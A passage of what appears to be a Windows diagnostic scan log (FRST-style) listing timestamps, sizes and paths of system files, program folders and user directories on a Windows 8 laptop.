2014-10-01 08:48 - 2014-05-26 12:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-10-01 08:48 - 2014-03-15 13:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2014-10-01 08:48 - 2013-07-21 12:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KingsIsle Entertainment
2014-10-01 08:48 - 2013-06-07 23:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-10-01 08:48 - 2013-04-19 21:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2014-10-01 08:48 - 2013-03-20 22:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVS4YOU
2014-10-01 08:48 - 2013-01-12 17:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-10-01 08:48 - 2012-12-23 08:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Software995
2014-10-01 08:48 - 2012-10-25 16:00 - 00000000 ____D () C:\windows\System32\Tasks\TOSHIBA
2014-10-01 08:48 - 2012-10-25 15:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRS Labs
2014-10-01 08:48 - 2012-10-25 15:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD VISION Engine Control Center
2014-10-01 08:48 - 2012-08-18 04:31 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-10-01 08:48 - 2012-08-18 04:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2014-10-01 08:48 - 2012-08-18 04:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\windows\ImmersiveControlPanel
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\WinMetadata
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\registration
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-01 07:52 - 2012-12-18 23:25 - 00000000 ___HD () C:\Users\Jeremy and Heidi
2014-09-29 12:47 - 2014-09-12 21:56 - 00019800 _____ () C:\windows\system32\roboot64.exe
2014-09-25 20:29 - 2014-07-30 20:56 - 00000000 ____D () C:\Users\Jeremy and Heidi\Documents\Bandicam
2014-09-24 15:35 - 2012-07-25 22:37 - 00000000 __RHD () C:\Users\Default
2014-09-24 12:27 - 2014-05-18 20:50 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Origin
2014-09-24 12:26 - 2014-08-14 16:49 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\SlimWare Utilities Inc
2014-09-24 12:25 - 2012-12-18 23:28 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\TOSHIBA
2014-09-24 09:10 - 2014-08-03 17:36 - 00000000 ____D () C:\Users\Jeremy and Heidi\Documents\Bandicut
2014-09-23 14:35 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\NDF
2014-09-16 18:07 - 2014-07-12 10:50 - 00129024 ___SH () C:\Users\Jeremy and Heidi\Downloads\Thumbs.db
2014-09-16 02:09 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\rescache
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\windows\ToastData
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\PolicyDefinitions
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Defender
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2014-09-15 16:15 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal
2014-09-15 16:15 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\oobe
2014-09-15 16:13 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer
2014-09-15 16:13 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer
2014-09-15 16:13 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\SysWOW64\Dism
2014-09-15 16:13 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\Dism
2014-09-15 13:51 - 2014-06-29 13:33 - 00997632 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ndis.sys
2014-09-15 13:49 - 2014-06-29 13:33 - 02391280 _____ (Microsoft Corporation) C:\windows\explorer.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 02106176 _____ (Microsoft Corporation) C:\windows\SysWOW64\explorer.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 01842176 _____ (Microsoft Corporation) C:\windows\SysWOW64\dwmcore.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 01527808 _____ (Microsoft Corporation) C:\windows\system32\mfcore.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 01453568 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfcore.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 01403296 _____ (Microsoft Corporation) C:\windows\system32\winload.efi
2014-09-15 13:49 - 2014-06-29 13:33 - 01271584 _____ (Microsoft Corporation) C:\windows\system32\winload.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 01217352 _____ (Microsoft Corporation) C:\windows\system32\winresume.efi
2014-09-15 13:49 - 2014-06-29 13:33 - 01093904 _____ (Microsoft Corporation) C:\windows\system32\winresume.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 01048576 _____ (Microsoft Corporation) C:\windows\system32\mfasfsrcsnk.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00850944 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfasfsrcsnk.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00785408 _____ (Microsoft Corporation) C:\windows\system32\audiosrv.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00729600 _____ (Microsoft Corporation) C:\windows\system32\samsrv.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00680960 _____ (Microsoft Corporation) C:\windows\system32\vds.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 00583168 _____ (Microsoft Corporation) C:\windows\system32\mscms.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscms.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00207872 _____ (Microsoft Corporation) C:\windows\system32\DeviceSetupManager.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00190976 _____ (Microsoft Corporation) C:\windows\system32\vdsutil.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00106496 _____ (Microsoft Corporation) C:\windows\system32\samlib.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00080896 _____ (Microsoft Corporation) C:\windows\system32\MbaeParserTask.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 00067584 _____ (Microsoft Corporation) C:\windows\SysWOW64\samlib.dll
2014-09-15 13:48 - 2014-06-29 13:33 - 02219520 _____ (Microsoft Corporation) C:\windows\system32\dwmcore.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 02094592 _____ (Microsoft Corporation) C:\windows\system32\mmc.exe
2014-09-15 13:35 - 2014-06-29 13:28 - 01964544 _____ (Microsoft Corporation) C:\windows\system32\wlidsvc.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 01886208 _____ (Microsoft Corporation) C:\windows\system32\setupapi.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 01752064 _____ (Microsoft Corporation) C:\windows\SysWOW64\setupapi.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00894464 _____ (Microsoft Corporation) C:\windows\system32\iphlpsvc.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00261120 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Media.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00171520 _____ (Microsoft Corporation) C:\windows\system32\ncbservice.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00107520 _____ (Microsoft Corporation) C:\windows\system32\httpprxm.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00062464 _____ (Microsoft Corporation) C:\windows\system32\adhsvc.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00022528 _____ (Microsoft Corporation) C:\windows\system32\adhapi.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00017920 _____ (Microsoft Corporation) C:\windows\system32\httpprxp.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00015872 _____ (Microsoft Corporation) C:\windows\system32\keepaliveprovider.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 01611776 _____ (Microsoft Corporation) C:\windows\SysWOW64\mmc.exe
2014-09-15 13:34 - 2014-06-29 13:28 - 00666112 _____ (Microsoft Corporation) C:\windows\system32\MP4SDECD.DLL
2014-09-15 13:34 - 2014-06-29 13:28 - 00436736 _____ (Microsoft Corporation) C:\windows\SysWOW64\MP4SDECD.DLL
2014-09-15 13:34 - 2014-06-29 13:28 - 00406016 _____ (Microsoft Corporation) C:\windows\system32\Windows.Media.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 00256000 _____ (Microsoft Corporation) C:\windows\system32\WSDMon.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 00159232 _____ (Microsoft Corporation) C:\windows\system32\inetpp.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 00095232 _____ (Microsoft Corporation) C:\windows\system32\wiaacmgr.exe
2014-09-15 13:34 - 2014-06-29 13:28 - 00091880 _____ (Microsoft Corporation) C:\windows\system32\Drivers\partmgr.sys
2014-09-15 13:34 - 2014-06-29 13:28 - 00083968 _____ (Microsoft Corporation) C:\windows\SysWOW64\wiaacmgr.exe
2014-09-15 13:29 - 2014-06-29 13:27 - 01160192 _____ (Microsoft Corporation) C:\windows\system32\IKEEXT.DLL
2014-09-15 13:29 - 2014-06-29 13:27 - 00723968 _____ (Microsoft Corporation) C:\windows\system32\BFE.DLL
2014-09-15 13:29 - 2014-06-29 13:27 - 00096600 _____ (Microsoft Corporation) C:\windows\system32\Drivers\wfplwfs.sys
2014-09-15 13:27 - 2014-06-29 13:27 - 04917760 _____ (Microsoft Corporation) C:\windows\system32\sppsvc.exe
2014-09-15 13:27 - 2014-06-29 13:27 - 02371728 _____ (Microsoft Corporation) C:\windows\system32\WSService.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 01164288 _____ (Microsoft Corporation) C:\windows\system32\sppobjs.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00368640 _____ (Microsoft Corporation) C:\windows\system32\sppwinob.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00204800 _____ (Microsoft Corporation) C:\windows\system32\WSClient.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00183808 _____ (Microsoft Corporation) C:\windows\system32\WSSync.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00167424 _____ (Microsoft Corporation) C:\windows\SysWOW64\WSClient.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00159232 _____ (Microsoft Corporation) C:\windows\SysWOW64\WSSync.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00120320 _____ (Microsoft Corporation) C:\windows\system32\sppc.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00091648 _____ (Microsoft Corporation) C:\windows\SysWOW64\sppc.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00083968 _____ () C:\windows\SysWOW64\OEMLicense.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00081408 _____ (Microsoft Corporation) C:\windows\system32\setupcln.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00076800 _____ (Microsoft Corporation) C:\windows\SysWOW64\setupcln.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00058200 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dam.sys
2014-09-15 13:25 - 2014-06-29 13:25 - 03246592 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-09-15 13:25 - 2014-06-29 13:25 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\rdpudd.dll
2014-09-15 13:23 - 2014-06-29 13:25 - 00619008 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srv2.sys
2014-09-15 13:23 - 2014-06-29 13:25 - 00387268 _____ () C:\windows\system32\ApnDatabase.xml
2014-09-15 13:23 - 2014-06-29 13:25 - 00309760 _____ (Microsoft Corporation) C:\windows\system32\wusa.exe
2014-09-15 13:23 - 2014-06-29 13:25 - 00305152 _____ (Microsoft Corporation) C:\windows\SysWOW64\wusa.exe
2014-09-15 13:22 - 2014-06-29 13:25 - 00062976 _____ (Microsoft Corporation) C:\windows\system32\imagehlp.dll
2014-09-15 13:22 - 2014-06-29 13:25 - 00059392 _____ (Microsoft Corporation) C:\windows\SysWOW64\imagehlp.dll
2014-09-15 13:20 - 2014-06-29 13:25 - 00652288 _____ (Microsoft Corporation) C:\windows\system32\comctl32.dll
2014-09-15 13:20 - 2014-06-29 13:25 - 00541696 _____ (Microsoft Corporation) C:\windows\SysWOW64\comctl32.dll
2014-09-15 13:17 - 2014-07-09 22:46 - 01557504 _____ (Microsoft Corporation) C:\windows\system32\osk.exe
2014-09-15 13:17 - 2014-07-09 22:46 - 01440256 _____ (Microsoft Corporation) C:\windows\SysWOW64\osk.exe
2014-09-15 13:14 - 2014-05-14 20:49 - 19759104 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2014-09-15 13:14 - 2014-05-14 20:49 - 17562112 _____ (Microsoft Corporation) C:\windows\SysWOW64\shell32.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 01281536 _____ (Microsoft Corporation) C:\windows\system32\lsasrv.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 00588288 _____ (Microsoft Corporation) C:\windows\system32\SHCore.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 00452608 _____ (Microsoft Corporation) C:\windows\SysWOW64\SHCore.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 00439808 _____ (Microsoft Corporation) C:\windows\system32\lsm.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00778752 _____ (Microsoft Corporation) C:\windows\system32\oleaut32.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00626688 _____ (Microsoft Corporation) C:\windows\system32\resutils.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00551424 _____ (Microsoft Corporation) C:\windows\SysWOW64\oleaut32.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00488960 _____ (Microsoft Corporation) C:\windows\SysWOW64\resutils.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00374784 _____ (Microsoft Corporation) C:\windows\system32\clusapi.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00302080 _____ (Microsoft Corporation) C:\windows\SysWOW64\clusapi.dll
2014-09-15 13:03 - 2014-05-14 20:49 - 00269592 _____ (Microsoft Corporation) C:\windows\system32\Drivers\WdFilter.sys
2014-09-15 13:03 - 2014-05-14 20:49 - 00035856 _____ (Microsoft Corporation) C:\windows\system32\Drivers\WdBoot.sys
2014-09-15 13:02 - 2014-06-29 13:22 - 00600064 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-09-15 13:02 - 2014-06-29 13:22 - 00523776 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2014-09-15 12:55 - 2014-06-29 13:23 - 13661696 _____ (Microsoft Corporation) C:\windows\system32\Windows.UI.Xaml.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 01173504 _____ (Microsoft Corporation) C:\windows\system32\UIAutomationCore.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00914432 _____ (Microsoft Corporation) C:\windows\SysWOW64\UIAutomationCore.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00465240 _____ (Microsoft Corporation) C:\windows\system32\Drivers\fvevol.sys
2014-09-15 12:55 - 2014-06-29 13:22 - 00328192 _____ (Microsoft Corporation) C:\windows\system32\ubpm.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00247296 _____ (Microsoft Corporation) C:\windows\SysWOW64\ubpm.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00061784 _____ (Microsoft Corporation) C:\windows\system32\Drivers\crashdmp.sys
2014-09-15 12:55 - 2014-06-29 13:22 - 00020992 _____ (Microsoft Corporation) C:\windows\SysWOW64\wups.dll
2014-09-15 12:54 - 2014-06-29 13:22 - 10799104 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.UI.Xaml.dll
2014-09-15 12:54 - 2014-06-29 13:22 - 00049664 _____ (Microsoft Corporation) C:\windows\system32\wups.dll
2014-09-15 12:51 - 2014-06-29 13:21 - 00785624 _____ (Microsoft Corporation) C:\windows\system32\Drivers\Wdf01000.sys
2014-09-15 12:51 - 2014-06-29 13:21 - 00054488 _____ (Microsoft Corporation) C:\windows\system32\Drivers\WdfLdr.sys
2014-09-15 12:46 - 2014-06-29 13:16 - 02273792 _____ (Microsoft Corporation) C:\windows\SysWOW64\msftedit.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00439488 _____ (Microsoft Corporation) C:\windows\system32\WerFault.exe
2014-09-15 12:46 - 2014-06-29 13:16 - 00312832 _____ (Microsoft Corporation) C:\windows\system32\LocationApi.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00245760 _____ (Microsoft Corporation) C:\windows\SysWOW64\LocationApi.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00183808 _____ (Microsoft Corporation) C:\windows\system32\winmmbase.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00120144 _____ (Microsoft Corporation) C:\windows\system32\Drivers\msgpioclx.sys
2014-09-15 12:46 - 2014-06-29 13:16 - 00115712 _____ (Microsoft Corporation) C:\windows\system32\winmm.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 02839552 _____ (Microsoft Corporation) C:\windows\system32\msftedit.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00888832 _____ (Microsoft Corporation) C:\windows\system32\nshwfp.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00702464 _____ (Microsoft Corporation) C:\windows\SysWOW64\nshwfp.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00543744 _____ (Microsoft Corporation) C:\windows\system32\wwanmm.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00447488 _____ (Microsoft Corporation) C:\windows\system32\wwansvc.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00414208 _____ (Microsoft Corporation) C:\windows\system32\wwanconn.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00391168 _____ (Microsoft Corporation) C:\windows\system32\Windows.Networking.BackgroundTransfer.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00385768 _____ (Microsoft Corporation) C:\windows\SysWOW64\WerFault.exe
2014-09-15 12:45 - 2014-06-29 13:16 - 00381952 _____ (Microsoft Corporation) C:\windows\system32\FWPUCLNT.DLL
2014-09-15 12:45 - 2014-06-29 13:16 - 00370688 _____ (Microsoft Corporation) C:\windows\system32\Wwanadvui.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00321536 _____ (Microsoft Corporation) C:\windows\system32\Drivers\udfs.sys
2014-09-15 12:45 - 2014-06-29 13:16 - 00268800 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00263680 _____ (Microsoft Corporation) C:\windows\system32\wcmsvc.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00245248 _____ (Microsoft Corporation) C:\windows\SysWOW64\FWPUCLNT.DLL
2014-09-15 12:45 - 2014-06-29 13:16 - 00230912 _____ (Microsoft Corporation) C:\windows\system32\WinSCard.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00160256 _____ (Microsoft Corporation) C:\windows\SysWOW64\winmmbase.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00154112 _____ (Microsoft Corporation) C:\windows\SysWOW64\WinSCard.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00125440 _____ (Microsoft Corporation) C:\windows\SysWOW64\winmm.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\openfiles.exe
2014-09-15 12:45 - 2014-06-29 13:16 - 00074240 _____ (Microsoft Corporation) C:\windows\system32\wcmcsp.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\openfiles.exe
2014-09-15 12:39 - 2014-06-29 13:20 - 01338880 _____ (Microsoft Corporation) C:\windows\SysWOW64\WindowsCodecs.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00645120 _____ (Microsoft Corporation) C:\windows\system32\Windows.Security.Authentication.OnlineId.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00550912 _____ (Microsoft Corporation) C:\windows\SysWOW64\drvstore.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00504320 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\netcfgx.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00245248 _____ (Microsoft Corporation) C:\windows\system32\usbmon.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00180224 _____ (Microsoft Corporation) C:\windows\system32\SystemEventsBrokerServer.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00156160 _____ (Microsoft Corporation) C:\windows\system32\powercfg.cpl
2014-09-15 12:39 - 2014-06-29 13:19 - 00103936 _____ (Microsoft Corporation) C:\windows\system32\wpdbusenum.dll
2014-09-15 12:38 - 2014-06-29 13:20 - 01627648 _____ (Microsoft Corporation) C:\windows\system32\WindowsCodecs.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 01149952 _____ (Microsoft Corporation) C:\windows\system32\winmde.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00951808 _____ (Microsoft Corporation) C:\windows\system32\Windows.Globalization.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00893952 _____ (Microsoft Corporation) C:\windows\SysWOW64\winmde.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00703488 _____ (Microsoft Corporation) C:\windows\system32\drvstore.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\netcfgx.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00171008 _____ (Microsoft Corporation) C:\windows\system32\TimeBrokerServer.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00150016 _____ (Microsoft Corporation) C:\windows\system32\discan.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00145408 _____ (Microsoft Corporation) C:\windows\SysWOW64\powercfg.cpl
2014-09-15 12:38 - 2014-06-29 13:19 - 00117248 _____ (Microsoft Corporation) C:\windows\system32\NdisImPlatform.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 01101824 _____ (Microsoft Corporation) C:\windows\system32\wmpmde.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 00601088 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Globalization.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 00071168 _____ (Microsoft Corporation) C:\windows\system32\WSDPrintProxy.DLL
2014-09-15 12:37 - 2014-06-29 13:19 - 00049152 _____ (Microsoft Corporation) C:\windows\system32\DevDispItemProvider.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 00036352 _____ (Microsoft Corporation) C:\windows\SysWOW64\DevDispItemProvider.dll
2014-09-15 12:32 - 2014-06-29 13:15 - 01890816 _____ (Microsoft Corporation) C:\windows\system32\crypt32.dll
2014-09-15 12:32 - 2014-06-29 13:15 - 01569280 _____ (Microsoft Corporation) C:\windows\SysWOW64\crypt32.dll
2014-09-15 12:25 - 2014-07-09 22:46 - 00265216 _____ (Microsoft Corporation) C:\windows\system32\InkEd.dll
2014-09-15 12:20 - 2014-06-29 13:14 - 01255936 _____ (Microsoft Corporation) C:\windows\system32\certutil.exe
2014-09-15 12:20 - 2014-06-29 13:14 - 01013248 _____ (Microsoft Corporation) C:\windows\SysWOW64\certutil.exe
2014-09-15 12:19 - 2014-06-29 13:14 - 00141312 _____ (Microsoft Corporation) C:\windows\system32\cryptnet.dll
2014-09-15 12:19 - 2014-06-29 13:14 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptnet.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00362496 _____ (Adobe Systems Incorporated) C:\windows\system32\atmfd.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00300032 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\atmfd.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00046080 _____ (Adobe Systems) C:\windows\system32\atmlib.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00035328 _____ (Adobe Systems) C:\windows\SysWOW64\atmlib.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00567808 _____ (Microsoft Corporation) C:\windows\SysWOW64\duser.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00475136 _____ (Microsoft Corporation) C:\windows\system32\WWanAPI.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00385024 _____ (Microsoft Corporation) C:\windows\system32\ncsi.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00080896 _____ (Microsoft Corporation) C:\windows\SysWOW64\tasklist.exe
2014-09-15 11:39 - 2014-06-29 13:12 - 00079360 _____ (Microsoft Corporation) C:\windows\SysWOW64\taskkill.exe
2014-09-15 11:38 - 2014-06-29 13:12 - 00729600 _____ (Microsoft Corporation) C:\windows\system32\duser.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00611840 _____ (Microsoft Corporation) C:\windows\system32\wpd_ci.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00543232 _____ (Microsoft Corporation) C:\windows\system32\wlroamextension.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00410624 _____ (Microsoft Corporation) C:\windows\SysWOW64\wlroamextension.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00370688 _____ (Microsoft Corporation) C:\windows\SysWOW64\WWanAPI.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00297984 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ks.sys
2014-09-15 11:38 - 2014-06-29 13:12 - 00293376 _____ (Microsoft Corporation) C:\windows\system32\Windows.Networking.Connectivity.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00260096 _____ (Microsoft Corporation) C:\windows\system32\hotspotauth.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00197632 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Networking.Connectivity.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00107520 _____ (Microsoft Corporation) C:\windows\system32\taskkill.exe
2014-09-15 11:38 - 2014-06-29 13:12 - 00102400 _____ (Microsoft Corporation) C:\windows\system32\tasklist.exe
2014-09-15 11:38 - 2014-06-29 13:12 - 00087552 _____ (Microsoft Corporation) C:\windows\system32\wersvc.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00055296 _____ (Microsoft Corporation) C:\windows\SysWOW64\nlaapi.dll
2014-09-15 11:33 - 2014-06-29 13:12 - 01690624 _____ (Microsoft Corporation) C:\windows\system32\GdiPlus.dll
2014-09-15 11:33 - 2014-06-29 13:12 - 01437184 _____ (Microsoft Corporation) C:\windows\SysWOW64\GdiPlus.dll
2014-09-15 11:31 - 2014-06-29 13:12 - 01838080 _____ (Microsoft Corporation) C:\windows\system32\DWrite.dll
2014-09-15 11:31 - 2014-06-29 13:12 - 01421312 _____ (Microsoft Corporation) C:\windows\SysWOW64\DWrite.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 01043968 _____ (Microsoft Corporation) C:\windows\system32\usercpl.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00982016 _____ (Microsoft Corporation) C:\windows\system32\KernelBase.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00827904 _____ (Microsoft Corporation) C:\windows\system32\kerberos.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00684032 _____ (Microsoft Corporation) C:\windows\system32\objsel.dll
